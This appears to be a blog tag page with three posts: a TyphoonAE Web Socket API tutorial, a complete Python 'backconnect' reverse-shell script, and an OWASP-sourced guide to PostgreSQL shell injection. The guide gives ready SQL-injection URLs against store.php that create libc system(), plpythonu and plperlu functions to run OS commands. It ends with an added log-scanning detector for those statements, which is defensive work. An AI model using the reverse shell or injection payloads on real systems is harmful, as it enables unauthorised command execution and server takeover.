5 posts tagged 'Python'

  1. 2014.02.04 Web Socket API
  2. 2010.09.10 Python Shell Rebound on Windows
  3. 2010.08.05 PostgreSQL Shell Injection
2014. 2. 4. 19:13

Web Socket API


The Web Socket protocol enables web applications to maintain bidirectional communications with server-side processes. The typhoonae.websocket package provides a Web Socket Service API for GAE applications. It was introduced by the TyphoonAE 0.1.2 release and does not run on the production Google App Engine platform.

However, in order to enable the Web Socket API for the Google App Engine SDK, go through the following guide.

Patching the Google App Engine SDK (Python) to enable TyphoonAE's Web Socket API

To get an idea of how Web Sockets could work with GAE, download the SDK 1.5.0 patch from this location. It also includes a demo app and some basic instructions.

Web Browsers Supporting Web Sockets

Overview

Since Bret Taylor came up with a neat implementation of a Web Socket handler for the Tornado web server, it's no longer a hassle to get an experimental Web Socket service up and running. A client can establish a Web Socket connection to the service which solely utilizes web hooks to dispatch messages to and from an application.


A client requests (1) a web page containing the JavaScript call to establish a Web Socket connection (2) to a URL provided by the application. The application and Web Socket service communicate over web hooks (3, 4).

Sending and Receiving Web Socket Messages

We distinguish between two types of incoming Web Socket messages. A handshake message is received once per Web Socket session when the client establishes the connection. This type of message can be handled separately by a request handler. All other incoming messages can be handled by another request handler. The API we use in our handshake handler is the same as in the handler for all other incoming Web Socket messages. However, in many cases it is very useful to handle Web Socket handshake messages separately from normal messages.

In order to handle incoming Web Socket requests, add this script handler to the handlers section of the app.yaml file.

  - url: /_ah/websocket/.*
    script: script.py
    login: admin

Define the correct URL mapping for your WSGI application:

  app = google.appengine.ext.webapp.WSGIApplication([
    ('/_ah/websocket/handshake/(.*)', HandshakeHandler),
    ('/_ah/websocket/message/(.*)', MessageHandler),
  ], debug=True)

Our Web Socket API provides a convenience function to obtain the appropriate service URL. It has one argument for additional URI information:

  websocket_url = typhoonae.websocket.create_websocket_url('/foo/bar')

The following request handler receives and sends messages from and to a Web Socket. The POST method is used to receive an incoming message where the first non-self argument contains the additional URI information from above:

  class MessageHandler(google.appengine.ext.webapp.RequestHandler):
    """Handles Web Socket requests."""

    def post(self, path):
      message = typhoonae.websocket.Message(self.request.POST)
      typhoonae.websocket.send_message(
        [message.socket], 'Received: "%s"' % message.body)

The message object has two attributes, socket and body. The former is a string containing the socket id. The latter contains our message body as a unicode string.

The client, usually a Web Socket capable browser, establishes a Web Socket by using JavaScript:

  ws = new WebSocket("ws://example.com");

Broadcast Messages

TyphoonAE adds another very useful function which enables an app to broadcast messages to all currently open Web Sockets of an app. Without this convenient method a developer has to implement a solution to remember all open Web Sockets. By using broadcast_message the Web Socket service takes care of it.

  class MessageHandler(google.appengine.ext.webapp.RequestHandler):
    """Handles Web Socket requests."""

    def post(self, path):
      message = typhoonae.websocket.Message(self.request.POST)
      typhoonae.websocket.broadcast_message(message.body)

Handling Closed Sockets

Applications sometimes should be informed when a socket is closed. Therefore, an app can implement a third request handler for the following URL pattern:

    '/_ah/websocket/closed/(.*)'

The success path can be utilized for keeping track of additional information such as encoded user IDs.

  class SocketClosedHandler(google.appengine.ext.webapp.RequestHandler):
    """Handler for socket closed events."""

    def post(self, path):
      user = decode_user_from_path(path)
      typhoonae.websocket.broadcast_message('%s has left the building' % user)
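
The handler above calls decode_user_from_path without defining it. One way to write it so that a user ID carried in the Web Socket URL cannot be altered by the client, as an added example (not TyphoonAE code; written for Python 3; SECRET_KEY, encode_user_to_path and the "payload.tag" path layout are assumptions):

```python
import base64
import hashlib
import hmac

# Assumption: a per-application secret that never leaves the server.
SECRET_KEY = b"constructed-demo-key"


def _tag(payload):
    """Hex HMAC-SHA256 over the encoded user ID."""
    return hmac.new(SECRET_KEY, payload.encode("ascii"), hashlib.sha256).hexdigest()


def encode_user_to_path(user_id):
    """Build the extra URI information to hand to create_websocket_url()."""
    payload = base64.urlsafe_b64encode(user_id.encode("utf-8")).decode("ascii")
    payload = payload.rstrip("=")  # keep the path free of padding characters
    return "/%s.%s" % (payload, _tag(payload))


def decode_user_from_path(path):
    """Return the user ID, or None if the path is malformed or was tampered with."""
    try:
        payload, tag = path.lstrip("/").split(".", 1)
        expected = _tag(payload)
    except (ValueError, UnicodeEncodeError):
        return None
    # Constant-time comparison on bytes, so odd input cannot raise TypeError.
    if not hmac.compare_digest(tag.encode("utf-8"), expected.encode("ascii")):
        return None
    padded = payload + "=" * (-len(payload) % 4)
    try:
        return base64.urlsafe_b64decode(padded).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    path = encode_user_to_path("alice")
    print(path, "->", decode_user_from_path(path))
    print("tampered ->", decode_user_from_path(path[:-1] + "x"))
```

A handler should skip the broadcast when decode_user_from_path returns None.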

See http://dev.w3.org/html5/websockets/ for further information on Web Sockets.




Source: code.google.com


2010. 9. 10. 11:41

Python Shell Rebound on Windows

  #!/usr/bin/python
  import socket
  import sys
  import os

  def usage():
      print "Simple Python Backconnect Shell"
      print "Usage:"
      print "./bc.py [ip] [port]"
      quit()

  #Initialize socket
  s = socket.socket()

  #Check if required arguments have been filled
  try:
      ip = sys.argv[1]
      port = int(sys.argv[2])
  except:
      usage()

  #Connect to given target IP & port
  try:
      s.connect((ip, port))
  except:
      print "Connection Failed! Check your connection settings and try again."
      quit()

  while(1):
      data = s.recv(1024)
      if(data == 'quit\n'):
          s.close()
          break
      else:
          shell = os.popen(data).read()
          s.send(shell)

  print "Exiting..."
  s.close()
  #Author: OrderZero

2010. 8. 5. 15:19

PostgreSQL Shell Injection

Shell Injection

PostgreSQL provides a mechanism to add custom functions using either dynamic libraries or scripting languages such as Python, Perl, and Tcl.

Dynamic Library

Until PostgreSQL 8.1, it was possible to add a custom function linked with libc:

  • CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Since system returns an int, how can we fetch the results from system's stdout?

Here's a little trick:

  • Create a stdout table:
    CREATE TABLE stdout(id serial, system_out text)
  • Execute a shell command, redirecting its stdout:
    SELECT system('uname -a > /tmp/test')
  • Use a COPY statement to push the output of the previous command into the stdout table:
    COPY stdout(system_out) FROM '/tmp/test'
  • Retrieve the output from stdout:
    SELECT system_out FROM stdout

Example:

 
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

plpython

PL/Python allows users to code PostgreSQL functions in Python. It is untrusted, so there is no way to restrict what a user can do. It is not installed by default and can be enabled on a given database with CREATELANG.

  • Check if PL/Python has been enabled on a database:
    SELECT count(*) FROM pg_language WHERE lanname='plpythonu'
  • If not, try to enable:
    CREATE LANGUAGE plpythonu
  • If either of the above succeeded, create a proxy shell function:
    CREATE FUNCTION proxyshell(text) RETURNS text AS 'import os; return os.popen(args[0]).read()' LANGUAGE plpythonu
  • Have fun with:
    SELECT proxyshell(os command);

Example:

  • Create a proxy shell function:
    /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS 'import os; return os.popen(args[0]).read()' LANGUAGE plpythonu;--
  • Run an OS Command:
    /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--

plperl

PL/Perl allows us to code PostgreSQL functions in Perl. Normally, it is installed as a trusted language in order to disable runtime execution of operations that interact with the underlying operating system, such as open. By doing so, it's impossible to gain OS-level access. To successfully inject a proxyshell-like function, we need to install the untrusted version as the postgres user, to avoid the so-called application mask filtering of trusted/untrusted operations.

  • Check if PL/perl-untrusted has been enabled:
    SELECT count(*) FROM pg_language WHERE lanname='plperlu'
  • If not, assuming that the sysadm has already installed the plperl package, try:
    CREATE LANGUAGE plperlu
  • If either of the above succeeded, create a proxy shell function:
    CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu
  • Have fun with:
    SELECT proxyshell(os command);

Example:

  • Create a proxy shell function:
    /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu;
  • Run an OS Command:
    /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--
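
For detection, the statements used in the three techniques above stand out in a PostgreSQL statement log. The following is an added example, not part of the OWASP text: it scans log lines for function creation in C or an untrusted language, enabling of plpythonu/plperlu, and server-side COPY from a file. The log lines are constructed samples, and their prefix format and the items table are assumptions.

```python
import re

# Patterns for the statement shapes described in this post.
RULES = [
    ("untrusted-language-enabled", re.compile(
        r"\bCREATE\s+(?:OR\s+REPLACE\s+)?(?:PROCEDURAL\s+)?LANGUAGE\s+'?(?:plpythonu|plperlu)\b",
        re.I)),
    ("function-in-c-or-untrusted-language", re.compile(
        r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+'?(?:c|plpythonu|plperlu)'?(?!\w)",
        re.I | re.S)),
    ("server-side-copy-from-file", re.compile(
        r"\bCOPY\b[^;]*\bFROM\s+'/", re.I)),
]

# Only lines that log a statement are inspected.
STATEMENT_RE = re.compile(r"\bLOG:\s+statement:\s+(.*)", re.S)

# Constructed sample lines (statement logging enabled; prefix is an assumption).
SAMPLE_LOG = [
    "2010-08-05 15:19:01 KST LOG:  statement: SELECT name FROM items WHERE id=1",
    "2010-08-05 15:19:02 KST LOG:  statement: SELECT name FROM items WHERE id=1; "
    "CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' "
    "LANGUAGE 'C' STRICT --",
    "2010-08-05 15:19:03 KST LOG:  statement: SELECT name FROM items WHERE id=1; "
    "COPY stdout(system_out) FROM '/tmp/test' --",
    "2010-08-05 15:19:04 KST LOG:  statement: CREATE LANGUAGE plpythonu",
    "2010-08-05 15:19:05 KST LOG:  statement: CREATE FUNCTION add_one(int) "
    "RETURNS int AS 'SELECT $1 + 1' LANGUAGE sql",
    "2010-08-05 15:19:06 KST LOG:  duration: 0.412 ms",
]


def scan(lines):
    """Return (line_number, rule_name) for every rule a logged statement matches."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = STATEMENT_RE.search(line)
        if not match:
            continue
        statement = match.group(1)
        for name, pattern in RULES:
            if pattern.search(statement):
                findings.append((number, name))
    return findings


if __name__ == "__main__":
    for number, name in scan(SAMPLE_LOG):
        print("line %d: %s" % (number, name))
```

Creating C-language functions and untrusted languages requires superuser rights, so a hit on these rules from a web application's connection also means that connection is using an over-privileged database role.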


Source: www.owasp.org
